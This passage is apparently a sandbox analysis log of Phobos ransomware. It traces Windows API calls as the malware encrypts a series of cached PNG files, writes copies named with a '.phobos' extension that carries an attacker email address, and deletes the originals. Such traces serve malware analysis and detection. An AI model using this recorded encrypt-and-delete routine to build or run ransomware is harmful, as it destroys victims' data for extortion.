files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.890] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=594) returned 1 [0176.890] CloseHandle (hObject=0x158) returned 1 [0176.890] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png")) returned 0x2020 [0176.890] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.890] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.890] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.891] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.891] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.891] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x252, lpOverlapped=0x0) returned 1 [0176.900] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x260, dwBufLen=0x260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x260) returned 1 [0176.900] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x260, lpOverlapped=0x0) returned 1 [0176.901] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.901] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.901] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.901] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.901] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.901] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.902] CloseHandle (hObject=0x158) returned 1 [0176.902] CloseHandle (hObject=0x194) returned 1 [0176.902] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png")) returned 1 [0176.903] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.903] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=539) returned 1 [0176.903] CloseHandle (hObject=0x194) returned 1 [0176.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png")) returned 0x2020 [0176.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.904] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.904] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.904] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.904] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.904] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x21b, lpOverlapped=0x0) returned 1 [0176.906] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x220, dwBufLen=0x220 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x220) returned 1 [0176.906] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x220, lpOverlapped=0x0) returned 1 [0176.907] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.907] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.907] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.907] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.907] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.907] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.907] CloseHandle (hObject=0x194) returned 1 [0176.907] CloseHandle (hObject=0x158) returned 1 [0176.908] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png")) returned 1 [0176.909] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.910] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=635) returned 1 [0176.910] CloseHandle (hObject=0x158) returned 1 [0176.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png")) returned 0x2020 [0176.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.910] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.910] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.911] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.911] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.911] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x27b, lpOverlapped=0x0) returned 1 [0176.917] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x280, dwBufLen=0x280 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x280) returned 1 [0176.917] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x280, lpOverlapped=0x0) returned 1 [0176.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0176.918] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.918] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.918] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.918] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.918] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.918] CloseHandle (hObject=0x158) returned 1 [0176.918] CloseHandle (hObject=0x194) returned 1 [0176.918] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png")) returned 1 [0176.919] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.920] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=616) returned 1 [0176.920] CloseHandle (hObject=0x194) returned 1 [0176.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png")) returned 0x2020 [0176.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.920] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.920] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.920] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.921] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.921] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x268, lpOverlapped=0x0) returned 1 [0176.926] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270, dwBufLen=0x270 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270) returned 1 [0176.926] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x270, lpOverlapped=0x0) returned 1 [0176.927] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0176.927] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.927] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.927] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.927] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.927] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.927] CloseHandle (hObject=0x194) returned 1 [0176.927] CloseHandle (hObject=0x158) returned 1 [0176.927] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png")) returned 1 [0176.928] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.929] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=542) returned 1 [0176.929] CloseHandle (hObject=0x158) returned 1 [0176.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png")) returned 0x2020 [0176.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.929] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.929] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.930] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.930] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.930] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x21e, lpOverlapped=0x0) returned 1 [0177.151] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x220, dwBufLen=0x220 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x220) returned 1 [0177.151] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: 